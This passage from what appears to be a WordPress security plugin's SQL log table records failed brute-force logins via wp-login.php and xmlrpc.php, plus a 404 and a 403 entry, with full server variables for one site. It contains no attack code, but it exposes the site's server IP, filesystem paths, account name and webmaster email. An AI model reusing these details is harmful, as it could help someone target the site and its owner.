Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa73vcf2CQI4cfFpC9BcjQAAAMM\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/test/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa73vcf2CQI4cfFpC9BcjQAAAMM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.100.249.231\";s:11:\"REMOTE_PORT\";s:5:\"58908\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/test/\";s:10:\"SCRIPT_URL\";s:6:\"/test/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa73vcf2CQI4cfFpC9BcjQAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571747773.782\";s:12:\"REQUEST_TIME\";s:10:\"1571747773\";}}','notice','2019-10-22 12:36:15','2019-10-22 12:36:14',34965888,36768480,'https://bintara.com.my/test/?key=testActivation',1,0,'5.100.249.231'),(23285,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRGJQ0@TGWC-1tzGX5faQAAAIE\";s:12:\"REDIRECT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.62.104.150\";s:11:\"REMOTE_PORT\";s:5:\"42098\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRGJQ0@TGWC-1tzGX5faQAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852645.1399\";s:12:\"REQUEST_TIME\";s:10:\"1566852645\";}}','notice','2019-08-26 20:50:48','2019-08-26 20:50:45',18315840,19601048,'http://bintara.com.my/cms/xmlrpc.php',1,0,'178.62.104.150'),(23286,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/www/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRGJh90bn5mtr-PXqq41wAAAEk\";s:12:\"REDIRECT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"184.168.152.144\";s:11:\"REMOTE_PORT\";s:5:\"24568\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRGJh90bn5mtr-PXqq41wAAAEk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852646.4411\";s:12:\"REQUEST_TIME\";s:10:\"1566852646\";}}','notice','2019-08-26 20:50:48','2019-08-26 20:50:46',18309384,19511008,'http://bintara.com.my/www/xmlrpc.php',1,0,'184.168.152.144'),(28869,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/blog/tag/video-conferencing/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbBBO4-K5JXPWliiue@iUwAAANY\";s:12:\"REDIRECT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"REMOTE_ADDR\";s:14:\"178.154.171.50\";s:11:\"REMOTE_PORT\";s:5:\"63211\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:51:\"https://bintara.com.my/blog/tag/video-conferencing/\";s:10:\"SCRIPT_URL\";s:29:\"/blog/tag/video-conferencing/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbBBO4-K5JXPWliiue@iUwAAANY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571832123.9734\";s:12:\"REQUEST_TIME\";s:10:\"1571832123\";}}','notice','2019-10-23 12:02:07','2019-10-23 12:02:04',34212760,36012848,'https://bintara.com.my/blog/tag/video-conferencing/',1,0,'178.154.171.50'),(23089,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.18.209.241\";s:11:\"REMOTE_PORT\";s:5:\"38382\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWONbrLuw7edOKpgf7B7RgAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566805358.6377\";s:12:\"REQUEST_TIME\";s:10:\"1566805358\";}}','notice','2019-08-26 07:42:40','2019-08-26 07:42:39',17683928,19174272,'https://bintara.com.my/wp-login.php',1,0,'46.18.209.241'),(23090,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.117.203\";s:11:\"REMOTE_PORT\";s:5:\"16068\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOQDsc7g4l7i3TBndV9@gAAAEU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566806030.6925\";s:12:\"REQUEST_TIME\";s:10:\"1566806030\";}}','notice','2019-08-26 07:53:52','2019-08-26 07:53:51',17683944,19177280,'https://bintara.com.my/wp-login.php',1,0,'178.128.117.203'),(23091,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.78.197\";s:11:\"REMOTE_PORT\";s:5:\"38344\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOT7bLuw7edOKpgf7B8qgAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566807021.4013\";s:12:\"REQUEST_TIME\";s:10:\"1566807021\";}}','notice','2019-08-26 08:10:22','2019-08-26 08:10:21',17683160,19174512,'https://bintara.com.my/wp-login.php',1,0,'162.144.78.197'),(23092,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.241.155\";s:11:\"REMOTE_PORT\";s:5:\"37772\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWOV5ElLQKVpx7Mms7vEQAAAAc4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566807524.1733\";s:12:\"REQUEST_TIME\";s:10:\"1566807524\";}}','notice','2019-08-26 08:18:46','2019-08-26 08:18:44',17683208,19173592,'https://bintara.com.my/wp-login.php',1,0,'173.212.241.155'),(23093,0,'brute_force','invalid-login::username-baoma','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"baoma\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.241.155\";s:11:\"REMOTE_PORT\";s:5:\"38552\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lump